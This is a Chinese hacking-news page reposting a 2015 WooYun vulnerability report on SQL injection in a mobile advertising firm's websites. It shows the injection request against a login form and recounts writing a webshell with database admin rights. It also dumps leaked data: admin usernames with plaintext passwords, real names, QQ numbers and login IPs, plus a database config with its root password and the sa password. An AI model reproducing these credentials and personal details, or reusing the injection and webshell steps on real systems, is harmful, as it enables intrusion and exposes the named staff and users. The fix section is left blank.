记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

布丁移动某站SQL注射(沦陷所有上线业务/泄露180W用户手机imei号操作型号/大量内部代理商信息)

2015-10-16 15:00

首先说明下,这个是干嘛的吧,好像就是在各种APP啊,渠道啊挂广告,靠点击量赚取收益的,比如有些APP会有页面广告,大约就是这样,然后各个公司代理啊,就会注册建立渠道合作,危害还是蛮大的,可以替换部分广告包已达到挂马和别的用途







而且暴露了下载APP的imei

(手机串号)和下载IP时间,手机型号,手机操作平台版本。







各个渠道代理商的分润和结算都能涉及到,







涉及了百度,京东,淘宝,小米,还有很多大厂商渠道 图比较多,审核老大耐心看



POST /do.asp HTTP/1.1

Host: www.wapqq.cn

Content-Length: 42

Accept: */*

Origin: http://www.wapqq.cn

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/x-www-form-urlencoded

Referer: http://www.wapqq.cn/

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: ASPSESSIONIDQCSSSDQC=LKJNAHEBHOMEKKLNCBIOBENG





action=login&username=aaaa'&password=admin







同IP下一个站点的注入,







这个比较方便,然后SA权限echo写入一句话,上传大马



通过列举数据库发现了大量的数据,



然后依次登录平台,





总结了下主要是可以替换广告包APP挂马,然后泄露了180W用户的手机串号和型号(下载点击广告可以记录用户的手机串号?),





还有就是详细的收支情况

漏洞证明:

caidao.png

222.png

cp.png

kaipiao.png

sp.png

sp1.png

百度.png

百度助手.png

代理商.png

到账.png

到账111.png

工资账号.png

广告wifi.png

广告主.png

开票.png

内部财务.png

渠道.png

渠道1.png

工资账号.png

身份证.png

渠道商.png

淘宝京东.png

通话精力.png

10000000万.png

code 区域
手机串号

code 区域
Database: sp

Table: Admin_User

[9 entries]

+-----------+--------------+

| uname | upwd |

+-----------+--------------+

| annidao | 19871013 |

| bink | bink12345 |

| chenlei | chenlei12345 |

| devin | 123456 |

| kangpeng | kp123456 |

| lenv | 585858 |

| robin | 12345 |

| sunlei | sunlei12345 |

| wsj890817 | 13956655260 |

+-----------+--------------+









mask 区域
*****s_lockjiaoselas*****

*****22, 23, 24, 252013/11/22 14:10:14False42015/8/25 11*****

*****2013/11/25 15:11:59False42015/8/17 15:35:04222.*****

*****/26 11:09:58False42015/6/8 13:54:18222.185.23*****

*****:10False52015/8/28 15:47:13222.185.238.*****

*****/6/10 13:29:03119.123.180.1251842769410http://*****

*****5, 262013/12/10 12:15:15False42015/7/15 17:11:46*****

***** 16:30:07220.165.250.108674091165ht*****

*****6http://s.bdmob.cn/huodong/shuju.asp?hid=226&bid=514&q*****












帐号列表
管理员账号账户密码真实姓名所属用户组注册时间最后登陆最后登陆IP客服Q Q操作
liuling 123456 刘羚 商务 2014/10/8 15:28:03 2015/8/17 15:01:21 222.185.238.130 1169693696

robin robin2013 刘利斌 管理员 2014/9/10 13:14:23 2015/7/2 16:30:07 220.165.250.108 674091165 修改 删除
kangpeng kp123456 康鹏 管理员 2013/12/10 12:15:15 2015/7/15 17:11:46 222.185.238.130 35331570 修改 删除
wendy 123456 杨晓婉 推广 2013/12/9 18:05:57 2015/6/10 13:29:03 119.123.180.125 1842769410 修改 删除
annidao 19871013 王芳 行政 2013/11/28 16:05:10 2015/8/28 15:47:13 222.185.238.130 578105779 修改 删除
bink bink131623 许斌 管理员 2013/11/26 11:09:58 2015/6/8 13:54:18 222.185.238.130 1957414736 修改 删除
devin 123456 申龙 管理员 2013/11/25 15:11:59 2015/8/31 11:48:22 27.223.16.10 516615050 修改 删除
wsj890817 13956655260 吴胜杰 管理员 2013/11/22 14:10:14 2015/8/25 11:18:14 222.185.238.130 470642450








* 定义数据库配置参数
*/
// 数据库host名称
define('DB_HOST', '127.0.0.1');
// 数据库用户名
define('DB_USERNAME', 'root');
//数据库密码
define('DB_PASS', '55tdm5ys');
//数据库
define('DB_DBNAME', 'appcms');
//数据库编码
define('DB_CHARSET', 'utf8');
//表名前缀
define('TB_PREFIX', 'appcms_');





sa 12345

部分生产环境信息

code 区域
http://apkzn.com 【无标题文档】

http://www.bdmob.cn 【布丁无线移动营销服务平台】

http://www.apr-ifgc.com 【APR品牌优势|刷ECU|升级ECU|刷APR,MTM,GIAC,HPA ...】

http://wapqq.cn 【塞班手机软件园】

http://bdmob.cn 【联系我们-布丁无线移动营销服务平台】

http://tptx.cn 【图片天下(tptx.cn)-美女高清图片网站-唯美非主流图片 ...-丝袜 …】

http://45pic.com 【MTK跳转统计】

http://a.bdmob.cn 【布丁安卓市场-bdmarket-安卓(Android)手机应用软件|游戏下载】

http://app.bdmob.cn 【布丁安卓市场-bdmarket-安卓手机应用软件】

http://www.tptx.cn 【赵柯展示妩媚时尚高清写真 - 图片天下(tptx.cn)-美女高清 ...】

http://wapfm.com 【游戏-塞班手机软件园】

http://www.wapfm.com 【一键破解QQ免费刷钻刷Q币-塞班手机软件园】

受影响站点信息

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0138313

阅读:92397 | 评论:0 | 标签:移动

想收藏或者和大家分享这篇好文章→复制链接地址

“布丁移动某站SQL注射(沦陷所有上线业务/泄露180W用户手机imei号操作型号/大量内部代理商信息)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云